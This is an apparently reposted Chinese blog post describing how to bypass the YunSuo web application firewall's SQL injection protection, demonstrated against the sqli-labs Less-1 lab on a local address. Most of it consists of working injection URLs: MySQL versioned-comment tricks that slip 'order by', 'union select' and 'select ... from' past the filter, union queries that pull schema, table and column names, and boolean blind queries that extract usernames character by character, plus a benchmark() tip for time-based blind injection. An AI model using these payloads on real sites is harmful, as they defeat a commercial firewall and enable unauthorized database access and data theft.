云锁最新版SQL注入WAF绕过

作者:ghtwf01@星盟安全团队

前言

这里使用sqli-labs第一关字符型注入来测试

绕过and 1=1

直接使用and 1=1肯定会被拦截

使用%26%26即可代替and绕过,1=1可以用True表示,1=2可以用False表示

绕过order by

直接使用order by被拦截

使用order/*!60000ghtwf01*/by绕过

绕过union select

order by一样绕过姿势,使用union/*!60000ghtwf01*/select绕过

查询数据库名

过滤了group_concat(),限制了selectfrom的结合,from.无法绕过,使用/*!00000select*/绕过

http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,schema_name%20from%20information_schema.schemata%20limit%200,1--+

查询表名

http://192.168.0.7/sqli/Less-1/?id=0%27%20union/*!60000ghtwf01*//*!00000select*/%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1--+

查询列名

and%26%26代替

查询字段

盲注

布尔盲注

查询数据库名长度

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20length(database/**/())=8%20--+


查询第一个数据库名第一个字母
ascii()hex()均未被过滤,限制selectfrom的结合,使用/*!00000select*/

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(ascii(substr((/*!00000select*/%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105)%20--+


查询security数据库第一个表名第一个字母

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%200,1),1,1))=65)%20--+


查询users表第一个列名第一个字母

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20column_name%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20%26%26%20table_name=0x7573657273%20limit%200,1),1,1))=69)%20--+


查询字段

http://192.168.0.7/sqli/Less-1/?id=1%27%20%26%26%20(hex(substr((/*!00000select*/%20username%20from%20users%20limit%200,1),1,1))=44)%20--+

时间盲注

过滤了sleep()函数,使用benchmark()函数即可,查询规则参考上面布尔盲注

posted @ 2020-04-22 09:57  0DayBug  阅读(2275)  评论(0编辑  收藏  举报